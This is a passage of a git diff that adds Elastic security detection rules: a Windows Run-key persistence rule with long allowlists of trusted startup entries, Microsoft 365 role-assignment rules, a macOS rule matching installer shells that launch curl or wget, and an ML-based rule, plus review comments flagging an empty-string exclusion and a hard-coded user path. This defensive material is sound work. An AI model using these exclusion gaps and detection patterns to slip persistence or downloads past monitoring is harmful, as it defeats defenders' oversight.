as this is one of the most abused AESPs */\n not registry.data.strings : \"ctfmon.exe /n\" and\n not (registry.value : \"Application Restart #*\" and process.name : \"csrss.exe\") and\n not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n not registry.data.strings : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\") and\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\") and\n not (\n /* Logitech G Hub */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Logitech Inc\" and\n (\n process.name : \"lghub_agent.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\LGHUB\\\\lghub.exe\\\" --background\",\n \"\\\"?:\\\\Program Files\\\\LGHUB\\\\system_tray\\\\lghub_system_tray.exe\\\" --minimized\"\n )\n ) or\n (\n process.name : \"LogiBolt.exe\" and registry.data.strings : (\n \"?:\\\\Program Files\\\\Logi\\\\LogiBolt\\\\LogiBolt.exe --startup\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Logi\\\\LogiBolt\\\\LogiBolt.exe --startup\"\n )\n )\n ) or\n\n /* Google Drive File Stream, Chrome, and Google Update */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Google LLC\" and\n (\n process.name : \"GoogleDriveFS.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\*\\\\GoogleDriveFS.exe\\\" --startup_mode\"\n ) or\n\n process.name : \"chrome.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\",\n \"\\\"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\"\n ) or\n\n process.name : \"GoogleUpdate.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Update\\\\*\\\\GoogleUpdateCore.exe\\\"\"\n )\n )\n ) or\n\n /* MS Programs */\n (\n 
process.code_signature.trusted == true and process.code_signature.subject_name in (\"Microsoft Windows\", \"Microsoft Corporation\") and\n (\n process.name : \"msedge.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --no-startup-window --win-session-start /prefetch:5\",\n \"\\\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --win-session-start\",\n \"\\\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --no-startup-window --win-session-start\"\n ) or\n\n process.name : (\"Update.exe\", \"Teams.exe\") and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe --processStart \\\"Teams.exe\\\" --process-start-args \\\"--system-initiated\\\"\",\n \"?:\\\\ProgramData\\\\*\\\\Microsoft\\\\Teams\\\\Update.exe --processStart \\\"Teams.exe\\\" --process-start-args \\\"--system-initiated\\\"\"\n ) or\n\n process.name : \"OneDriveStandaloneUpdater.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\\Microsoft.SharePoint.exe\"\n ) or\n\n process.name : \"OneDriveSetup.exe\" and\n registry.data.strings : (\n \"?:\\\\Windows\\\\system32\\\\cmd.exe /q /c * \\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\"\",\n \"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe /background*\",\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" /background*\",\n \"?:\\\\Program Files\\\\Microsoft OneDrive\\\\OneDrive.exe /background *\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\??.???.????.????\\\\Microsoft.SharePoint.exe\"\n ) or\n \n process.name : \"OneDrive.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" /background\",\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" 
/background\",\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\\\" /background\"\n ) or\n \n process.name : \"Microsoft.SharePoint.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\??.???.????.????\\\\Microsoft.SharePoint.exe\"\n ) or\n \n process.name : \"MicrosoftEdgeUpdate.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\Expedient\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\*\\\\MicrosoftEdgeUpdateCore.exe\\\"\"\n ) or\n \n process.executable : \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\Installer\\\\setup.exe\" and\n registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\Installer\\\\setup.exe\\\" --msedgewebview --delete-old-versions --system-level --verbose-logging --on-logon\"\n )\n )\n ) or\n\n /* Slack */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\n \"Slack Technologies, Inc.\", \"Slack Technologies, LLC\"\n ) and process.name : \"slack.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\slack\\\\slack.exe\\\" --process-start-args --startup\",\n \"\\\"?:\\\\ProgramData\\\\*\\\\slack\\\\slack.exe\\\" --process-start-args --startup\",\n \"\\\"?:\\\\Program Files\\\\Slack\\\\slack.exe\\\" --process-start-args --startup\"\n )\n ) or\n\n /* Cisco */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\"Cisco WebEx LLC\", \"Cisco Systems, Inc.\") and\n (\n process.name : \"WebexHost.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe\\\" /daemon /runFrom=autorun\"\n )\n ) or\n (\n process.name : \"CiscoJabber.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Cisco Systems\\\\Cisco Jabber\\\\CiscoJabber.exe\\\" /min\"\n )\n )\n ) or\n\n /* Loom */\n (\n 
process.code_signature.trusted == true and process.code_signature.subject_name == \"Loom, Inc.\" and\n process.name : \"Loom.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Loom\\\\Loom.exe --process-start-args \\\"--loomHidden\\\"\"\n )\n ) or\n\n /* Adobe */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Adobe Inc.\" and\n process.name : (\"Acrobat.exe\", \"FlashUtil32_*_Plugin.exe\") and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\AdobeCollabSync.exe\\\"\",\n \"\\\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\AdobeCollabSync.exe\\\"\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\Macromed\\\\Flash\\\\FlashUtil32_*_Plugin.exe -update plugin\"\n )\n ) or\n\n /* CCleaner */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"PIRIFORM SOFTWARE LIMITED\" and\n process.name : (\"CCleanerBrowser.exe\", \"CCleaner64.exe\") and registry.data.strings : (\n \"\\\"C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe\\\" --check-run=src=logon --auto-launch-at-startup --profile-directory=\\\"Default\\\"\",\n \"\\\"C:\\\\Program Files\\\\CCleaner\\\\CCleaner64.exe\\\" /MONITOR\"\n )\n ) or\n\n /* Opera */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Opera Norway AS\" and\n process.name : \"opera.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Opera\\\\launcher.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Opera GX\\\\launcher.exe\"\n )\n ) or\n\n /* Avast */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Avast Software s.r.o.\" and\n process.name : \"AvastBrowser.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\AVAST Software\\\\Browser\\\\Application\\\\AvastBrowser.exe\\\" 
--check-run=src=logon --auto-launch-at-startup*\",\n \"\\\"?:\\\\Program Files (x86)\\\\AVAST Software\\\\Browser\\\\Application\\\\AvastBrowser.exe\\\" --check-run=src=logon --auto-launch-at-startup*\",\n \"\"\n )\n ) or\n\n /* Grammarly */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Grammarly, Inc.\" and\n process.name : \"GrammarlyInstaller.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Grammarly\\\\DesktopIntegrations\\\\Grammarly.Desktop.exe\"\n )\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "97fc44d3-8dae-4019-ae83-298c3015600f", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + 
"id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + } + ], + "timeline_id": "3e47ef71-ebfc-4520-975c-cb27fc090799", + "timeline_title": "Comprehensive Registry Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "97fc44d3-8dae-4019-ae83-298c3015600f_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_103.json b/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_103.json new file mode 100644 index 00000000000..db733711642 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_103.json 
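Review bot: The Avast exception in the EQL `query` of this new `_111` file ends its `registry.data.strings : (...)` list with a bare `""` pattern (the `\"\"` entry after the two `AvastBrowser.exe ... --auto-launch-at-startup*` strings), so any Run/RunOnce write of an empty value by a trusted Avast-signed `AvastBrowser.exe` is excluded regardless of the path written; this reads as a leftover and the entry should be dropped so the exception stays path-scoped. In the same block the `MicrosoftEdgeUpdate.exe` exception uses a hard-coded profile, `"?:\\Users\\Expedient\\AppData\\Local\\Microsoft\\EdgeUpdate\\*\\MicrosoftEdgeUpdateCore.exe"`, where every sibling exception uses `?:\\Users\\*\\...`; a single-username path in a shipped rule looks like a copied false-positive sample and should either be generalized to `*` or removed. The file appears to be a copy of the `_110` version with only `"version"` changed, so the same two entries exist in the `_110` hunk, which begins before this chunk.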
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a new role is assigned to a management group in Microsoft 365. An adversary may attempt to add a role in order to maintain persistence in an environment.", + "false_positives": [ + "A new role may be assigned to a management group by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Management Group Role Assignment", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"New-ManagementRoleAssignment\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-managementroleassignment?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/admin/add-users/about-admin-roles?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "98995807-5b09-4e37-8a54-5cae5dc932d7", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE 
ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "98995807-5b09-4e37-8a54-5cae5dc932d7_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_105.json b/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_105.json new file mode 100644 index 00000000000..765153bf251 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_105.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a new role is assigned to a management group in Microsoft 365. An adversary may attempt to add a role in order to maintain persistence in an environment.", + "false_positives": [ + "A new role may be assigned to a management group by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Management Group Role Assignment", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"New-ManagementRoleAssignment\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-managementroleassignment?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/admin/add-users/about-admin-roles?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "98995807-5b09-4e37-8a54-5cae5dc932d7", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE 
ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "98995807-5b09-4e37-8a54-5cae5dc932d7_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_206.json b/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_206.json new file mode 100644 index 00000000000..38334d6e4a7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/98995807-5b09-4e37-8a54-5cae5dc932d7_206.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a new role is assigned to a management group in Microsoft 365. An adversary may attempt to add a role in order to maintain persistence in an environment.", + "false_positives": [ + "A new role may be assigned to a management group by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Management Group Role Assignment", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"New-ManagementRoleAssignment\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-managementroleassignment?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/admin/add-users/about-admin-roles?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "98995807-5b09-4e37-8a54-5cae5dc932d7", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE 
ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "98995807-5b09-4e37-8a54-5cae5dc932d7_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_106.json b/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_106.json new file mode 100644 index 00000000000..a44da2f8ee3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/99239e7d-b0d4-46e3-8609-acafcf99f68c_106.json 
@@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the execution of a MacOS installer package with an abnormal child process (e.g bash) followed immediately by a network connection via a suspicious process (e.g curl). Threat actors will build and distribute malicious MacOS installer packages, which have a .pkg extension, many times imitating valid software in order to persuade and infect their victims often using the package files (e.g pre/post install scripts etc.) to download additional tools or malicious software. If this rule fires it should indicate the installation of a malicious or suspicious package.", + "false_positives": [ + "Custom organization-specific macOS packages that use .pkg files to run cURL could trigger this rule. If known behavior is causing false positives, it can be excluded from the rule." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "MacOS Installer Package Spawns Network Event", + "query": "sequence by host.id, user.id with maxspan=30s\n[process where host.os.type == \"macos\" and event.type == \"start\" and event.action == \"exec\" and process.parent.name : (\"installer\", \"package_script_service\") and process.name : (\"bash\", \"sh\", \"zsh\", \"python\", \"osascript\", \"tclsh*\")]\n[network where host.os.type == \"macos\" and event.type == \"start\" and process.name : (\"curl\", \"osascript\", \"wget\", \"python\")]\n", + "references": [ + "https://redcanary.com/blog/clipping-silver-sparrows-wings", + "https://posts.specterops.io/introducing-mystikal-4fbd2f7ae520", + "https://github.com/D00MFist/Mystikal" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + 
"type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "99239e7d-b0d4-46e3-8609-acafcf99f68c", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Command and Control", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.007", + "name": "JavaScript", + "reference": "https://attack.mitre.org/techniques/T1059/007/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/", + "subtechnique": [ + { + "id": "T1071.001", + "name": "Web Protocols", + "reference": "https://attack.mitre.org/techniques/T1071/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "99239e7d-b0d4-46e3-8609-acafcf99f68c_106", + "type": "security-rule" +} \ No newline at end of file 
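Review bot: The ATT&CK mapping under `threat` lists only sub-technique T1059.007 (JavaScript), while the first sequence step matches `bash`, `sh`, `zsh`, `python`, `osascript` and `tclsh*`, so most hits would not be JavaScript execution. osascript can run JavaScript for Automation, which presumably motivates the choice, but T1059.004 (Unix Shell) and T1059.006 (Python) describe the matched interpreters more closely and would make the alert's technique fields more useful for triage. Separately, this is the only rule in the visible hunks without `"timestamp_override": "event.ingested"`; if that is deliberate for the sequence query it is worth a line in `setup`, otherwise adding it keeps the rule consistent with its siblings.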
diff --git a/packages/security_detection_engine/kibana/security_rule/994e40aa-8c85-43de-825e-15f665375ee8_3.json b/packages/security_detection_engine/kibana/security_rule/994e40aa-8c85-43de-825e-15f665375ee8_3.json new file mode 100644 index 00000000000..e71889eadd0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/994e40aa-8c85-43de-825e-15f665375ee8_3.json 
@@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A supervised machine learning model (ProblemChild) has identified a suspicious Windows process event with high probability of it being malicious activity. Alternatively, the model's blocklist identified the event as being malicious.", + "from": "now-10m", + "index": [ + "endgame-*", + "logs-endpoint.events.process-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Machine Learning Detected a Suspicious Windows Event with a High Malicious Probability Score", + "query": "process where ((problemchild.prediction == 1 and problemchild.prediction_probability > 0.98) or\nblocklist_label == 1) and not process.args : (\"*C:\\\\WINDOWS\\\\temp\\\\nessus_*.txt*\", \"*C:\\\\WINDOWS\\\\temp\\\\nessus_*.tmp*\")\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/problemchild", + "https://www.elastic.co/security-labs/detecting-living-off-the-land-attacks-with-new-elastic-integration" + ], + "related_integrations": [ + { + "package": "problemchild", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "blocklist_label", + "type": "unknown" + }, + { + "ecs": false, + "name": "problemchild.prediction", + "type": "unknown" + }, + { + "ecs": false, + "name": "problemchild.prediction_probability", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "994e40aa-8c85-43de-825e-15f665375ee8", + "setup": "## Setup\n\nThe rule requires the Living off the Land (LotL) Attack Detection integration assets to be installed, as well as Windows process events collected by integrations such as Elastic Defend or Winlogbeat. 
\n\n### LotL Attack Detection Setup\nThe LotL Attack Detection integration detects living-off-the-land activity in Windows process events.\n\n#### Prerequisite Requirements:\n- Fleet is required for LotL Attack Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Windows process events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) integration or Winlogbeat(https://www.elastic.co/guide/en/beats/winlogbeat/current/_winlogbeat_overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To set up and run Winlogbeat, follow [this](https://www.elastic.co/guide/en/beats/winlogbeat/current/winlogbeat-installation-configuration.html) guide.\n\n#### The following steps should be executed to install assets associated with the LotL Attack Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Living off the Land Attack Detection and select the integration to see more details about it.\n- Under Settings, click Install Living off the Land Attack Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\nBefore you can enable this rule, you'll need to enrich Windows process events with predictions from the Supervised LotL Attack Detection model. 
This is done via the ingest pipeline named `-problem_child_ingest_pipeline` installed with the LotL Attack Detection package.\n- If using an Elastic Beat such as Winlogbeat, add the LotL ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `winlogbeat.yml`.\n- If adding the LotL ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the LotL ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"problemchild\": {\n \"properties\": {\n \"prediction\": {\n \"type\": \"long\"\n },\n \"prediction_probability\": {\n \"type\": \"float\"\n }\n }\n },\n \"blocklist_label\": {\n \"type\": \"long\"\n }\n }\n}\n```\n", + "severity": "low", + "tags": [ + "OS: Windows", + "Data Source: Elastic Endgame", + "Use Case: Living off the Land Attack Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.004", + "name": "Masquerade Task or Service", + "reference": "https://attack.mitre.org/techniques/T1036/004/" + } + ] + } + ] + } + ], + "timestamp_override": 